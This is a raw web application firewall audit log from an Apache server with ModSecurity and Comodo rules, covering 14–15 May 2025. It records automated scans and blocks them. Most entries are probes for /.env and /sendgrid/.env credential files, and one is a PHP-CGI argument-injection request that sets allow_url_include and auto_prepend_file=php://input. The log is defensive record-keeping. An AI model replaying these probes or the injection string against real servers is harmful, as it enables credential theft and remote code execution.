[uri "%s"]%s Stopwatch: 1747189181604214 4559 (- - -) Stopwatch2: 1747189181604214 4559; combined=2983, p1=647, p2=2235, p3=32, p4=37, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a40e4a45-Z-- --e025962e-A-- [14/May/2025:09:19:43 +0700] aCP9v8abX6K9rhby1vgbDgAAAIY 103.236.140.4 35952 103.236.140.4 8181 --e025962e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --e025962e-C-- }Ñexamplecom --e025962e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --e025962e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189183094049 3501 (- - -) Stopwatch2: 1747189183094049 3501; combined=2326, p1=478, p2=1751, p3=35, p4=32, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e025962e-Z-- --f560bf6a-A-- [14/May/2025:09:19:44 +0700] aCP9wMOlTOX2TmGW6_-4eQAAAM0 103.236.140.4 36020 103.236.140.4 8181 --f560bf6a-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --f560bf6a-C-- Ešexamplecom --f560bf6a-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --f560bf6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189184740958 4529 (- - -) Stopwatch2: 1747189184740958 4529; combined=3013, p1=688, p2=2202, p3=44, p4=43, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f560bf6a-Z-- --b7ed0930-A-- [14/May/2025:11:32:05 +0700] aCQcxTMGvM3GPb0-SySkKwAAAFE 103.236.140.4 60702 103.236.140.4 8181 --b7ed0930-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.197.238 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.197.238 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b7ed0930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7ed0930-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747197125835949 635 (- - -) Stopwatch2: 1747197125835949 635; combined=262, p1=234, p2=0, p3=0, p4=0, p5=28, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7ed0930-Z-- --c7e3d85c-A-- [14/May/2025:12:51:08 +0700] aCQvTMOlTOX2TmGW6__SfQAAAMM 103.236.140.4 51442 103.236.140.4 8181 --c7e3d85c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 207.154.197.113 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c7e3d85c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7e3d85c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747201868450500 767 (- - -) Stopwatch2: 1747201868450500 767; combined=275, p1=240, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7e3d85c-Z-- --9b59aa6a-A-- [14/May/2025:13:18:26 +0700] aCQ1sjMGvM3GPb0-SyQfagAAAEw 103.236.140.4 59682 103.236.140.4 8181 --9b59aa6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; NCE-AL00 Build/HUAWEINCE-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6904 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --9b59aa6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b59aa6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747203506997440 702 (- - -) Stopwatch2: 1747203506997440 702; combined=299, p1=267, p2=0, p3=0, p4=0, p5=32, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b59aa6a-Z-- --92511e7d-A-- [14/May/2025:13:40:43 +0700] aCQ66zMGvM3GPb0-SyQ8xgAAAEU 103.236.140.4 58324 103.236.140.4 8181 --92511e7d-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.99.181.249 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --92511e7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92511e7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747204843007939 675 (- - -) Stopwatch2: 1747204843007939 675; combined=239, p1=208, p2=0, p3=0, p4=0, p5=31, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92511e7d-Z-- --8936834d-A-- [14/May/2025:13:58:47 +0700] aCQ_J8OlTOX2TmGW6_8mTwAAAMY 103.236.140.4 47282 103.236.140.4 8181 --8936834d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --8936834d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8936834d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747205927750342 750 (- - -) Stopwatch2: 1747205927750342 750; combined=311, p1=263, p2=0, p3=0, p4=0, p5=48, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8936834d-Z-- --f6602c49-A-- [14/May/2025:15:10:58 +0700] aCRQEsOlTOX2TmGW6_-LeAAAANM 103.236.140.4 51262 103.236.140.4 8181 --f6602c49-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.92.107.174 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.92.107.174 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f6602c49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6602c49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747210258374575 798 (- - -) Stopwatch2: 1747210258374575 798; combined=339, p1=304, p2=0, p3=0, p4=0, p5=35, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6602c49-Z-- --fa098c68-A-- [14/May/2025:16:35:14 +0700] aCRj0jMGvM3GPb0-SyQJ6gAAAEg 103.236.140.4 32936 103.236.140.4 8181 --fa098c68-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 178.128.207.138 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fa098c68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa098c68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747215314225228 792 (- - -) Stopwatch2: 1747215314225228 792; combined=312, p1=278, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa098c68-Z-- --c215443f-A-- [14/May/2025:16:41:04 +0700] aCRlMMabX6K9rhby1vhThwAAAIU 103.236.140.4 47032 103.236.140.4 8181 --c215443f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.240 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 --c215443f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c215443f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747215664963533 738 (- - -) Stopwatch2: 1747215664963533 738; combined=327, p1=289, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c215443f-Z-- --8939091d-A-- [14/May/2025:17:36:58 +0700] aCRySsabX6K9rhby1vit4QAAAIs 103.236.140.4 34770 103.236.140.4 8181 --8939091d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 171.244.40.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 171.244.40.232 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8939091d-C-- --8939091d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8939091d-E-- --8939091d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747219018056917 4661 (- - -) Stopwatch2: 1747219018056917 4661; combined=2998, p1=530, p2=2441, p3=0, p4=0, p5=27, sr=97, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8939091d-Z-- --d2753119-A-- [14/May/2025:18:37:37 +0700] aCSAgV1ltXwOneQqchMRjgAAAAI 103.236.140.4 48700 103.236.140.4 8181 --d2753119-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 159.203.57.61 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 159.203.57.61 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: */* --d2753119-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2753119-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747222657489335 840 (- - -) Stopwatch2: 1747222657489335 840; combined=345, p1=307, p2=0, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2753119-Z-- --138a4051-A-- [14/May/2025:19:04:47 +0700] aCSG311ltXwOneQqchNTQAAAAAM 103.236.140.4 46474 103.236.140.4 8181 --138a4051-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.197.238 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.197.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --138a4051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --138a4051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747224287708837 902 (- - -) Stopwatch2: 1747224287708837 902; combined=398, p1=358, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --138a4051-Z-- --7d96aa1d-A-- [14/May/2025:19:36:12 +0700] aCSOPDMGvM3GPb0-SySmLwAAAEk 103.236.140.4 39312 103.236.140.4 8181 --7d96aa1d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.217.145.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.217.145.218 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7d96aa1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d96aa1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747226172495803 1034 (- - -) Stopwatch2: 1747226172495803 1034; combined=405, p1=369, p2=0, p3=0, p4=0, p5=36, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d96aa1d-Z-- --f1a8c266-A-- [14/May/2025:19:36:12 +0700] aCSOPMOlTOX2TmGW6_-tIwAAANQ 103.236.140.4 39322 103.236.140.4 8181 --f1a8c266-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.217.145.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.217.145.218 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f1a8c266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1a8c266-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747226172558370 854 (- - -) Stopwatch2: 1747226172558370 854; combined=297, p1=266, p2=0, p3=0, p4=0, p5=31, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1a8c266-Z-- --ec6da23d-A-- [14/May/2025:19:36:14 +0700] aCSOPsOlTOX2TmGW6_-tSwAAANg 103.236.140.4 39466 103.236.140.4 8181 --ec6da23d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.217.145.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.217.145.218 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --ec6da23d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec6da23d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747226174211552 599 (- - -) Stopwatch2: 1747226174211552 599; combined=227, p1=201, p2=0, p3=0, p4=0, p5=26, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec6da23d-Z-- --ec025006-A-- [14/May/2025:21:57:45 +0700] aCSvaV1ltXwOneQqchPmzQAAAAs 103.236.140.4 43130 103.236.140.4 8181 --ec025006-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Mi A1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ec025006-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec025006-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747234665493726 784 (- - -) Stopwatch2: 1747234665493726 784; combined=311, p1=277, p2=0, p3=0, p4=0, p5=33, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec025006-Z-- --b2d13179-A-- [15/May/2025:00:10:16 +0700] aCTOeMabX6K9rhby1vjAigAAAJY 103.236.140.4 47092 103.236.140.4 8181 --b2d13179-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.121.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.121.74 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b2d13179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2d13179-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747242616174212 814 (- - -) Stopwatch2: 1747242616174212 814; combined=378, p1=348, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2d13179-Z-- --50a8d21c-A-- [15/May/2025:00:56:01 +0700] aCTZMTMGvM3GPb0-SyTRIAAAAEU 103.236.140.4 59528 103.236.140.4 8181 --50a8d21c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1 Accept-Charset: utf-8 --50a8d21c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50a8d21c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747245361882666 807 (- - -) Stopwatch2: 1747245361882666 807; combined=359, p1=314, p2=0, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
